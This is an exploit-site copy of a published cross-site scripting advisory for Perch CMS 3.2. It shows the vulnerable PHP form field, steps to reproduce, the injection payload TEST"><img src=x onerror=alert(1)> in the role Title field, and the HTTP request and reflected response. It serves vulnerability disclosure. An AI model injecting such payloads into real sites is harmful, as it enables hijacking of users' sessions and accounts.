Edit Report

Our sensors found this exploit at:

Below is a copy:

Perch CMS 3.2 Cross Site Scripting
# Exploit Title:
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Version: 3.2
# Tested on: Windows Server 2022
# Blog:

XSS #1:


Line #57:

<div class="field-wrap <?php echo $Form->error('roleTitle', false);?>">
        <?php echo $Form->label('roleTitle', 'Title'); ?>
        <div class="form-entry">
            <?php echo $Form->text('roleTitle', $Form->get($details,
'roleTitle')); ?>

Steps to Reproduce:

1. Login to application
2. Go to Roles
3. Select Title
4. Enter payload TEST"><img src=x onerror=alert(1)>

// HTTP POST request

POST /perch/perch/core/users/roles/edit/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/114.0


// HTTP response

HTTP/1.1 200 OK
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4

<a href="/perch/perch/core/users/roles/edit/?id=1">TEST"><img src=x

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.